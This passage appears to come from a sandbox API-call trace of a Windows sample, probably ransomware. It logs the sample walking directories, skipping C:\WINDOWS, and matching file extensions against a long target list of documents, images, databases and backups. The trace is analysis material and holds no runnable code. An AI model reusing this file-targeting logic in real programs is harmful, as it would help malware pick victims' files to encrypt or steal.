ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0167.905] FindClose (in: hFindFile=0x801e98 | out: hFindFile=0x801e98) returned 1 [0167.905] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e80050 | out: hHeap=0x710000) returned 1 [0167.905] FindNextFileW (in: hFindFile=0x8020d8, lpFindFileData=0x391fcf8 | out: lpFindFileData=0x391fcf8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77970000, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0167.906] FindNextFileW (in: hFindFile=0x8020d8, lpFindFileData=0x391fcf8 | out: lpFindFileData=0x391fcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77970000, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0167.906] lstrlenW (lpString="C:\\588bce7c90097ed212") returned 21 [0167.906] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\588bce7c90097ed212") returned 1 [0167.906] lstrlenW (lpString="588bce7c90097ed212") returned 18 [0167.906] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="588bce7c90097ed212") returned 1 [0167.906] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3e80050 [0167.907] lstrlenW (lpString="C:\\588bce7c90097ed212") returned 21 [0167.907] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\*", lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x802398 [0167.919] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0167.919] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1025", cAlternateFileName="")) returned 1 [0167.919] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025") returned 26 [0167.919] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\588bce7c90097ed212\\1025") returned 1 [0167.919] lstrlenW (lpString="1025") returned 4 [0167.919] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="1025") returned 1 [0167.919] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3e90058 [0167.919] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025") returned 26 [0167.919] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\*", lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x594fc3e9, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802058 [0167.919] FindNextFileW (in: hFindFile=0x802058, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x594fc3e9, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.919] FindNextFileW (in: hFindFile=0x802058, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0167.919] lstrlenW (lpString="eula.rtf") returned 8 [0167.919] lstrlenW (lpString=".1cd") returned 4 [0167.919] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0167.919] lstrlenW (lpString=".3ds") returned 4 [0167.920] lstrcmpiW (lpString1=".3ds", lpString2=".rtf") returned -1 [0167.920] lstrlenW (lpString=".3fr") returned 4 [0167.920] lstrcmpiW (lpString1=".3fr", lpString2=".rtf") returned -1 [0167.920] lstrlenW (lpString=".3g2") returned 4 [0167.920] lstrcmpiW (lpString1=".3g2", lpString2=".rtf") returned -1 [0167.920] lstrlenW (lpString=".3gp") returned 4 [0167.920] lstrcmpiW (lpString1=".3gp", lpString2=".rtf") returned -1 [0167.920] lstrlenW (lpString=".7z") returned 3 [0167.920] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0167.920] lstrlenW (lpString=".accda") returned 6 [0167.920] lstrcmpiW (lpString1=".accda", lpString2="la.rtf") returned -1 [0167.920] lstrlenW (lpString=".accdb") returned 6 [0167.920] lstrcmpiW (lpString1=".accdb", lpString2="la.rtf") returned -1 [0167.920] lstrlenW (lpString=".accdc") returned 6 [0167.920] lstrcmpiW (lpString1=".accdc", lpString2="la.rtf") returned -1 [0167.920] lstrlenW (lpString=".accde") returned 6 [0167.920] lstrcmpiW (lpString1=".accde", lpString2="la.rtf") returned -1 [0167.920] lstrlenW (lpString=".accdt") returned 6 [0167.920] lstrcmpiW (lpString1=".accdt", lpString2="la.rtf") returned -1 [0167.920] lstrlenW (lpString=".accdw") returned 6 [0167.920] lstrcmpiW (lpString1=".accdw", lpString2="la.rtf") returned -1 [0167.920] lstrlenW (lpString=".adb") returned 4 [0167.920] lstrcmpiW (lpString1=".adb", lpString2=".rtf") returned -1 [0167.920] lstrlenW (lpString=".adp") returned 4 [0167.920] lstrcmpiW (lpString1=".adp", lpString2=".rtf") returned -1 [0167.920] lstrlenW (lpString=".ai") returned 3 [0167.921] lstrcmpiW (lpString1=".ai", lpString2="rtf") returned -1 [0167.921] lstrlenW (lpString=".ai3") returned 4 [0167.921] lstrcmpiW (lpString1=".ai3", lpString2=".rtf") returned -1 [0167.921] lstrlenW (lpString=".ai4") returned 4 [0167.921] lstrcmpiW (lpString1=".ai4", lpString2=".rtf") returned -1 [0167.921] lstrlenW (lpString=".ai5") returned 4 [0167.921] lstrcmpiW (lpString1=".ai5", lpString2=".rtf") returned -1 [0167.921] lstrlenW (lpString=".ai6") returned 4 [0167.921] lstrcmpiW (lpString1=".ai6", lpString2=".rtf") returned -1 [0167.921] lstrlenW (lpString=".ai7") returned 4 [0167.921] lstrcmpiW (lpString1=".ai7", lpString2=".rtf") returned -1 [0167.921] lstrlenW (lpString=".ai8") returned 4 [0167.921] lstrcmpiW (lpString1=".ai8", lpString2=".rtf") returned -1 [0167.921] lstrlenW (lpString=".anim") returned 5 [0167.921] lstrcmpiW (lpString1=".anim", lpString2="a.rtf") returned -1 [0167.921] lstrlenW (lpString=".arw") returned 4 [0167.921] lstrcmpiW (lpString1=".arw", lpString2=".rtf") returned -1 [0167.921] lstrlenW (lpString=".as") returned 3 [0167.921] lstrcmpiW (lpString1=".as", lpString2="rtf") returned -1 [0167.921] lstrlenW (lpString=".asa") returned 4 [0167.921] lstrcmpiW (lpString1=".asa", lpString2=".rtf") returned -1 [0167.921] lstrlenW (lpString=".asc") returned 4 [0167.921] lstrcmpiW (lpString1=".asc", lpString2=".rtf") returned -1 [0167.921] lstrlenW (lpString=".ascx") returned 5 [0167.921] lstrcmpiW (lpString1=".ascx", lpString2="a.rtf") returned -1 [0167.921] lstrlenW (lpString=".asm") returned 4 [0167.921] lstrcmpiW (lpString1=".asm", lpString2=".rtf") returned -1 [0167.921] lstrlenW (lpString=".asmx") returned 5 [0167.922] lstrcmpiW (lpString1=".asmx", lpString2="a.rtf") returned -1 [0167.922] lstrlenW (lpString=".asp") returned 4 [0167.922] lstrcmpiW (lpString1=".asp", lpString2=".rtf") returned -1 [0167.922] lstrlenW (lpString=".aspx") returned 5 [0167.922] lstrcmpiW (lpString1=".aspx", lpString2="a.rtf") returned -1 [0167.922] lstrlenW (lpString=".asr") returned 4 [0167.922] lstrcmpiW (lpString1=".asr", lpString2=".rtf") returned -1 [0167.922] lstrlenW (lpString=".asx") returned 4 [0167.922] lstrcmpiW (lpString1=".asx", lpString2=".rtf") returned -1 [0167.922] lstrlenW (lpString=".avi") returned 4 [0167.922] lstrcmpiW (lpString1=".avi", lpString2=".rtf") returned -1 [0167.922] lstrlenW (lpString=".avs") returned 4 [0167.922] lstrcmpiW (lpString1=".avs", lpString2=".rtf") returned -1 [0167.922] lstrlenW (lpString=".backup") returned 7 [0167.922] lstrcmpiW (lpString1=".backup", lpString2="ula.rtf") returned -1 [0167.922] lstrlenW (lpString=".bak") returned 4 [0167.922] lstrcmpiW (lpString1=".bak", lpString2=".rtf") returned -1 [0167.922] lstrlenW (lpString=".bay") returned 4 [0167.922] lstrcmpiW (lpString1=".bay", lpString2=".rtf") returned -1 [0167.922] lstrlenW (lpString=".bd") returned 3 [0167.922] lstrcmpiW (lpString1=".bd", lpString2="rtf") returned -1 [0167.922] lstrlenW (lpString=".bin") returned 4 [0167.922] lstrcmpiW (lpString1=".bin", lpString2=".rtf") returned -1 [0167.922] lstrlenW (lpString=".bmp") returned 4 [0167.922] lstrcmpiW (lpString1=".bmp", lpString2=".rtf") returned -1 [0167.922] lstrlenW (lpString=".bz2") returned 4 [0167.922] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0167.923] lstrlenW (lpString=".c") returned 2 [0167.923] lstrcmpiW (lpString1=".c", lpString2="tf") returned -1 [0167.923] lstrlenW (lpString=".cdr") returned 4 [0167.923] lstrcmpiW (lpString1=".cdr", lpString2=".rtf") returned -1 [0167.923] lstrlenW (lpString=".cer") returned 4 [0167.923] lstrcmpiW (lpString1=".cer", lpString2=".rtf") returned -1 [0167.923] lstrlenW (lpString=".cf") returned 3 [0167.923] lstrcmpiW (lpString1=".cf", lpString2="rtf") returned -1 [0167.923] lstrlenW (lpString=".cfc") returned 4 [0167.923] lstrcmpiW (lpString1=".cfc", lpString2=".rtf") returned -1 [0167.923] lstrlenW (lpString=".cfm") returned 4 [0167.923] lstrcmpiW (lpString1=".cfm", lpString2=".rtf") returned -1 [0167.923] lstrlenW (lpString=".cfml") returned 5 [0167.923] lstrcmpiW (lpString1=".cfml", lpString2="a.rtf") returned -1 [0167.923] lstrlenW (lpString=".cfu") returned 4 [0167.923] lstrcmpiW (lpString1=".cfu", lpString2=".rtf") returned -1 [0167.923] lstrlenW (lpString=".chm") returned 4 [0167.923] lstrcmpiW (lpString1=".chm", lpString2=".rtf") returned -1 [0167.923] lstrlenW (lpString=".cin") returned 4 [0167.923] lstrcmpiW (lpString1=".cin", lpString2=".rtf") returned -1 [0167.923] lstrlenW (lpString=".class") returned 6 [0167.923] lstrcmpiW (lpString1=".class", lpString2="la.rtf") returned -1 [0167.923] lstrlenW (lpString=".clx") returned 4 [0167.923] lstrcmpiW (lpString1=".clx", lpString2=".rtf") returned -1 [0167.923] lstrlenW (lpString=".config") returned 7 [0167.923] lstrcmpiW (lpString1=".config", lpString2="ula.rtf") returned -1 [0167.923] lstrlenW (lpString=".cpp") returned 4 [0167.923] lstrcmpiW (lpString1=".cpp", lpString2=".rtf") returned -1 [0167.924] lstrlenW (lpString=".cr2") returned 4 [0167.924] lstrcmpiW (lpString1=".cr2", lpString2=".rtf") returned -1 [0167.924] lstrlenW (lpString=".crt") returned 4 [0167.924] lstrcmpiW (lpString1=".crt", lpString2=".rtf") returned -1 [0167.924] lstrlenW (lpString=".crw") returned 4 [0167.924] lstrcmpiW (lpString1=".crw", lpString2=".rtf") returned -1 [0167.924] lstrlenW (lpString=".cs") returned 3 [0167.924] lstrcmpiW (lpString1=".cs", lpString2="rtf") returned -1 [0167.924] lstrlenW (lpString=".css") returned 4 [0167.924] lstrcmpiW (lpString1=".css", lpString2=".rtf") returned -1 [0167.924] lstrlenW (lpString=".csv") returned 4 [0167.924] lstrcmpiW (lpString1=".csv", lpString2=".rtf") returned -1 [0167.924] lstrlenW (lpString=".cub") returned 4 [0167.924] lstrcmpiW (lpString1=".cub", lpString2=".rtf") returned -1 [0167.924] lstrlenW (lpString=".dae") returned 4 [0167.924] lstrcmpiW (lpString1=".dae", lpString2=".rtf") returned -1 [0167.924] lstrlenW (lpString=".dat") returned 4 [0167.924] lstrcmpiW (lpString1=".dat", lpString2=".rtf") returned -1 [0167.924] lstrlenW (lpString=".db") returned 3 [0167.924] lstrcmpiW (lpString1=".db", lpString2="rtf") returned -1 [0167.924] lstrlenW (lpString=".dbf") returned 4 [0167.924] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0167.924] lstrlenW (lpString=".dbx") returned 4 [0167.924] lstrcmpiW (lpString1=".dbx", lpString2=".rtf") returned -1 [0167.924] lstrlenW (lpString=".dc3") returned 4 [0167.924] lstrcmpiW (lpString1=".dc3", lpString2=".rtf") returned -1 [0167.924] lstrlenW (lpString=".dcm") returned 4 [0167.925] lstrcmpiW (lpString1=".dcm", lpString2=".rtf") returned -1 [0167.925] lstrlenW (lpString=".dcr") returned 4 [0167.925] lstrcmpiW (lpString1=".dcr", lpString2=".rtf") returned -1 [0167.925] lstrlenW (lpString=".der") returned 4 [0167.925] lstrcmpiW (lpString1=".der", lpString2=".rtf") returned -1 [0167.925] lstrlenW (lpString=".dib") returned 4 [0167.925] lstrcmpiW (lpString1=".dib", lpString2=".rtf") returned -1 [0167.925] lstrlenW (lpString=".dic") returned 4 [0167.925] lstrcmpiW (lpString1=".dic", lpString2=".rtf") returned -1 [0167.925] lstrlenW (lpString=".dif") returned 4 [0167.925] lstrcmpiW (lpString1=".dif", lpString2=".rtf") returned -1 [0167.925] lstrlenW (lpString=".divx") returned 5 [0167.925] lstrcmpiW (lpString1=".divx", lpString2="a.rtf") returned -1 [0167.925] lstrlenW (lpString=".djvu") returned 5 [0167.925] lstrcmpiW (lpString1=".djvu", lpString2="a.rtf") returned -1 [0167.925] lstrlenW (lpString=".dng") returned 4 [0167.925] lstrcmpiW (lpString1=".dng", lpString2=".rtf") returned -1 [0167.925] lstrlenW (lpString=".doc") returned 4 [0167.925] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0167.925] lstrlenW (lpString=".docm") returned 5 [0167.925] lstrcmpiW (lpString1=".docm", lpString2="a.rtf") returned -1 [0167.925] lstrlenW (lpString=".docx") returned 5 [0167.925] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0167.925] lstrlenW (lpString=".dot") returned 4 [0167.925] lstrcmpiW (lpString1=".dot", lpString2=".rtf") returned -1 [0167.925] lstrlenW (lpString=".dotm") returned 5 [0167.925] lstrcmpiW (lpString1=".dotm", lpString2="a.rtf") returned -1 [0167.925] lstrlenW (lpString=".dotx") returned 5 [0167.926] lstrcmpiW (lpString1=".dotx", lpString2="a.rtf") returned -1 [0167.926] lstrlenW (lpString=".dpx") returned 4 [0167.926] lstrcmpiW (lpString1=".dpx", lpString2=".rtf") returned -1 [0167.926] lstrlenW (lpString=".dqy") returned 4 [0167.926] lstrcmpiW (lpString1=".dqy", lpString2=".rtf") returned -1 [0167.926] lstrlenW (lpString=".dsn") returned 4 [0167.926] lstrcmpiW (lpString1=".dsn", lpString2=".rtf") returned -1 [0167.926] lstrlenW (lpString=".dt") returned 3 [0167.926] lstrcmpiW (lpString1=".dt", lpString2="rtf") returned -1 [0167.926] lstrlenW (lpString=".dtd") returned 4 [0167.926] lstrcmpiW (lpString1=".dtd", lpString2=".rtf") returned -1 [0167.926] lstrlenW (lpString=".dwg") returned 4 [0167.926] lstrcmpiW (lpString1=".dwg", lpString2=".rtf") returned -1 [0167.926] lstrlenW (lpString=".dwt") returned 4 [0167.926] lstrcmpiW (lpString1=".dwt", lpString2=".rtf") returned -1 [0167.926] lstrlenW (lpString=".dx") returned 3 [0167.926] lstrcmpiW (lpString1=".dx", lpString2="rtf") returned -1 [0167.926] lstrlenW (lpString=".dxf") returned 4 [0167.926] lstrcmpiW (lpString1=".dxf", lpString2=".rtf") returned -1 [0167.926] lstrlenW (lpString=".edml") returned 5 [0167.926] lstrcmpiW (lpString1=".edml", lpString2="a.rtf") returned -1 [0167.926] lstrlenW (lpString=".efd") returned 4 [0167.926] lstrcmpiW (lpString1=".efd", lpString2=".rtf") returned -1 [0167.926] lstrlenW (lpString=".elf") returned 4 [0167.926] lstrcmpiW (lpString1=".elf", lpString2=".rtf") returned -1 [0167.926] lstrlenW (lpString=".emf") returned 4 [0167.926] lstrcmpiW (lpString1=".emf", lpString2=".rtf") returned -1 [0167.926] lstrlenW (lpString=".emz") returned 4 [0167.927] lstrcmpiW (lpString1=".emz", lpString2=".rtf") returned -1 [0167.927] lstrlenW (lpString=".epf") returned 4 [0167.927] lstrcmpiW (lpString1=".epf", lpString2=".rtf") returned -1 [0167.927] lstrlenW (lpString=".eps") returned 4 [0167.927] lstrcmpiW (lpString1=".eps", lpString2=".rtf") returned -1 [0167.927] lstrlenW (lpString=".epsf") returned 5 [0167.927] lstrcmpiW (lpString1=".epsf", lpString2="a.rtf") returned -1 [0167.927] lstrlenW (lpString=".epsp") returned 5 [0167.927] lstrcmpiW (lpString1=".epsp", lpString2="a.rtf") returned -1 [0167.927] lstrlenW (lpString=".erf") returned 4 [0167.927] lstrcmpiW (lpString1=".erf", lpString2=".rtf") returned -1 [0167.927] lstrlenW (lpString=".exr") returned 4 [0167.927] lstrcmpiW (lpString1=".exr", lpString2=".rtf") returned -1 [0167.927] lstrlenW (lpString=".f4v") returned 4 [0167.927] lstrcmpiW (lpString1=".f4v", lpString2=".rtf") returned -1 [0167.927] lstrlenW (lpString=".fido") returned 5 [0167.927] lstrcmpiW (lpString1=".fido", lpString2="a.rtf") returned -1 [0167.927] lstrlenW (lpString=".flm") returned 4 [0167.927] lstrcmpiW (lpString1=".flm", lpString2=".rtf") returned -1 [0167.927] lstrlenW (lpString=".flv") returned 4 [0167.927] lstrcmpiW (lpString1=".flv", lpString2=".rtf") returned -1 [0167.927] lstrlenW (lpString=".frm") returned 4 [0167.927] lstrcmpiW (lpString1=".frm", lpString2=".rtf") returned -1 [0167.927] lstrlenW (lpString=".fxg") returned 4 [0167.927] lstrcmpiW (lpString1=".fxg", lpString2=".rtf") returned -1 [0167.927] lstrlenW (lpString=".geo") returned 4 [0167.927] lstrcmpiW (lpString1=".geo", lpString2=".rtf") returned -1 [0167.927] lstrlenW (lpString=".gif") returned 4 [0167.928] lstrcmpiW (lpString1=".gif", lpString2=".rtf") returned -1 [0167.928] lstrlenW (lpString=".grs") returned 4 [0167.928] lstrcmpiW (lpString1=".grs", lpString2=".rtf") returned -1 [0167.928] lstrlenW (lpString=".gz") returned 3 [0167.928] lstrcmpiW (lpString1=".gz", lpString2="rtf") returned -1 [0167.928] lstrlenW (lpString=".h") returned 2 [0167.928] lstrcmpiW (lpString1=".h", lpString2="tf") returned -1 [0167.928] lstrlenW (lpString=".hdr") returned 4 [0167.928] lstrcmpiW (lpString1=".hdr", lpString2=".rtf") returned -1 [0167.928] lstrlenW (lpString=".hpp") returned 4 [0167.928] lstrcmpiW (lpString1=".hpp", lpString2=".rtf") returned -1 [0167.928] lstrlenW (lpString=".hta") returned 4 [0167.928] lstrcmpiW (lpString1=".hta", lpString2=".rtf") returned -1 [0167.928] lstrlenW (lpString=".htc") returned 4 [0167.928] lstrcmpiW (lpString1=".htc", lpString2=".rtf") returned -1 [0167.928] lstrlenW (lpString=".htm") returned 4 [0167.928] lstrcmpiW (lpString1=".htm", lpString2=".rtf") returned -1 [0167.928] lstrlenW (lpString=".html") returned 5 [0167.928] lstrcmpiW (lpString1=".html", lpString2="a.rtf") returned -1 [0167.928] lstrlenW (lpString=".icb") returned 4 [0167.928] lstrcmpiW (lpString1=".icb", lpString2=".rtf") returned -1 [0167.928] lstrlenW (lpString=".ics") returned 4 [0167.928] lstrcmpiW (lpString1=".ics", lpString2=".rtf") returned -1 [0167.928] lstrlenW (lpString=".iff") returned 4 [0167.928] lstrcmpiW (lpString1=".iff", lpString2=".rtf") returned -1 [0167.928] lstrlenW (lpString=".inc") returned 4 [0167.928] lstrcmpiW (lpString1=".inc", lpString2=".rtf") returned -1 [0167.928] lstrlenW (lpString=".indd") returned 5 [0167.929] lstrcmpiW (lpString1=".indd", lpString2="a.rtf") returned -1 [0167.929] lstrlenW (lpString=".ini") returned 4 [0167.929] lstrcmpiW (lpString1=".ini", lpString2=".rtf") returned -1 [0167.929] lstrlenW (lpString=".iqy") returned 4 [0167.929] lstrcmpiW (lpString1=".iqy", lpString2=".rtf") returned -1 [0167.929] lstrlenW (lpString=".j2c") returned 4 [0167.929] lstrcmpiW (lpString1=".j2c", lpString2=".rtf") returned -1 [0167.929] lstrlenW (lpString=".j2k") returned 4 [0167.929] lstrcmpiW (lpString1=".j2k", lpString2=".rtf") returned -1 [0167.929] lstrlenW (lpString=".java") returned 5 [0167.929] lstrcmpiW (lpString1=".java", lpString2="a.rtf") returned -1 [0167.929] lstrlenW (lpString=".jp2") returned 4 [0167.929] lstrcmpiW (lpString1=".jp2", lpString2=".rtf") returned -1 [0167.929] lstrlenW (lpString=".jpc") returned 4 [0167.929] lstrcmpiW (lpString1=".jpc", lpString2=".rtf") returned -1 [0167.929] lstrlenW (lpString=".jpe") returned 4 [0167.929] lstrcmpiW (lpString1=".jpe", lpString2=".rtf") returned -1 [0167.929] lstrlenW (lpString=".jpeg") returned 5 [0167.929] lstrcmpiW (lpString1=".jpeg", lpString2="a.rtf") returned -1 [0167.929] lstrlenW (lpString=".jpf") returned 4 [0167.929] lstrcmpiW (lpString1=".jpf", lpString2=".rtf") returned -1 [0167.929] lstrlenW (lpString=".jpg") returned 4 [0167.929] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0167.929] lstrlenW (lpString=".jpx") returned 4 [0167.929] lstrcmpiW (lpString1=".jpx", lpString2=".rtf") returned -1 [0167.929] lstrlenW (lpString=".js") returned 3 [0167.929] lstrcmpiW (lpString1=".js", lpString2="rtf") returned -1 [0167.929] lstrlenW (lpString=".jsf") returned 4 [0167.929] lstrcmpiW (lpString1=".jsf", lpString2=".rtf") returned -1 [0167.930] lstrlenW (lpString=".json") returned 5 [0167.930] lstrcmpiW (lpString1=".json", lpString2="a.rtf") returned -1 [0167.930] lstrlenW (lpString=".jsp") returned 4 [0167.930] lstrcmpiW (lpString1=".jsp", lpString2=".rtf") returned -1 [0167.930] lstrlenW (lpString=".kdc") returned 4 [0167.930] lstrcmpiW (lpString1=".kdc", lpString2=".rtf") returned -1 [0167.930] lstrlenW (lpString=".kmz") returned 4 [0167.930] lstrcmpiW (lpString1=".kmz", lpString2=".rtf") returned -1 [0167.930] lstrlenW (lpString=".kwm") returned 4 [0167.930] lstrcmpiW (lpString1=".kwm", lpString2=".rtf") returned -1 [0167.930] lstrlenW (lpString=".lasso") returned 6 [0167.930] lstrcmpiW (lpString1=".lasso", lpString2="la.rtf") returned -1 [0167.930] lstrlenW (lpString=".lbi") returned 4 [0167.930] lstrcmpiW (lpString1=".lbi", lpString2=".rtf") returned -1 [0167.930] lstrlenW (lpString=".lgf") returned 4 [0167.930] lstrcmpiW (lpString1=".lgf", lpString2=".rtf") returned -1 [0167.930] lstrlenW (lpString=".lgp") returned 4 [0167.930] lstrcmpiW (lpString1=".lgp", lpString2=".rtf") returned -1 [0167.930] lstrlenW (lpString=".log") returned 4 [0167.930] lstrcmpiW (lpString1=".log", lpString2=".rtf") returned -1 [0167.930] lstrlenW (lpString=".m1v") returned 4 [0167.930] lstrcmpiW (lpString1=".m1v", lpString2=".rtf") returned -1 [0167.930] lstrlenW (lpString=".m4a") returned 4 [0167.930] lstrcmpiW (lpString1=".m4a", lpString2=".rtf") returned -1 [0167.930] lstrlenW (lpString=".m4v") returned 4 [0167.930] lstrcmpiW (lpString1=".m4v", lpString2=".rtf") returned -1 [0167.930] lstrlenW (lpString=".max") returned 4 [0167.931] lstrcmpiW (lpString1=".max", lpString2=".rtf") returned -1 [0167.931] lstrlenW (lpString=".md") returned 3 [0167.931] lstrcmpiW (lpString1=".md", lpString2="rtf") returned -1 [0167.931] lstrlenW (lpString=".mda") returned 4 [0167.931] lstrcmpiW (lpString1=".mda", lpString2=".rtf") returned -1 [0167.931] lstrlenW (lpString=".mdb") returned 4 [0167.931] lstrcmpiW (lpString1=".mdb", lpString2=".rtf") returned -1 [0167.931] lstrlenW (lpString=".mde") returned 4 [0167.931] lstrcmpiW (lpString1=".mde", lpString2=".rtf") returned -1 [0167.931] lstrlenW (lpString=".mdf") returned 4 [0167.931] lstrcmpiW (lpString1=".mdf", lpString2=".rtf") returned -1 [0167.931] lstrlenW (lpString=".mdw") returned 4 [0167.931] lstrcmpiW (lpString1=".mdw", lpString2=".rtf") returned -1 [0167.931] lstrlenW (lpString=".mef") returned 4 [0167.931] lstrcmpiW (lpString1=".mef", lpString2=".rtf") returned -1 [0167.931] lstrlenW (lpString=".mft") returned 4 [0167.931] lstrcmpiW (lpString1=".mft", lpString2=".rtf") returned -1 [0167.931] lstrlenW (lpString=".mfw") returned 4 [0168.714] lstrcmpiW (lpString1=".mfw", lpString2=".rtf") returned -1 [0168.714] lstrlenW (lpString=".mht") returned 4 [0168.714] lstrcmpiW (lpString1=".mht", lpString2=".rtf") returned -1 [0168.728] lstrlenW (lpString=".mhtml") returned 6 [0168.728] lstrcmpiW (lpString1=".mhtml", lpString2="la.rtf") returned -1 [0168.728] lstrlenW (lpString=".mka") returned 4 [0168.728] lstrcmpiW (lpString1=".mka", lpString2=".rtf") returned -1 [0168.729] lstrlenW (lpString=".mkidx") returned 6 [0168.729] lstrcmpiW (lpString1=".mkidx", lpString2="la.rtf") returned -1 [0168.729] lstrlenW (lpString=".mkv") returned 4 [0168.729] lstrcmpiW (lpString1=".mkv", lpString2=".rtf") returned -1 [0168.729] lstrlenW (lpString=".mos") returned 4 [0168.729] lstrcmpiW (lpString1=".mos", lpString2=".rtf") returned -1 [0168.729] lstrlenW (lpString=".mov") returned 4 [0168.729] lstrcmpiW (lpString1=".mov", lpString2=".rtf") returned -1 [0168.729] lstrlenW (lpString=".mp3") returned 4 [0168.729] lstrcmpiW (lpString1=".mp3", lpString2=".rtf") returned -1 [0168.729] lstrlenW (lpString=".mp4") returned 4 [0168.729] lstrcmpiW (lpString1=".mp4", lpString2=".rtf") returned -1 [0168.729] lstrlenW (lpString=".mpeg") returned 5 [0168.729] lstrcmpiW (lpString1=".mpeg", lpString2="a.rtf") returned -1 [0168.729] lstrlenW (lpString=".mpg") returned 4 [0168.729] lstrcmpiW (lpString1=".mpg", lpString2=".rtf") returned -1 [0168.729] lstrlenW (lpString=".mpv") returned 4 [0168.729] lstrcmpiW (lpString1=".mpv", lpString2=".rtf") returned -1 [0168.729] lstrlenW (lpString=".mrw") returned 4 [0168.729] lstrcmpiW (lpString1=".mrw", lpString2=".rtf") returned -1 [0168.729] lstrlenW 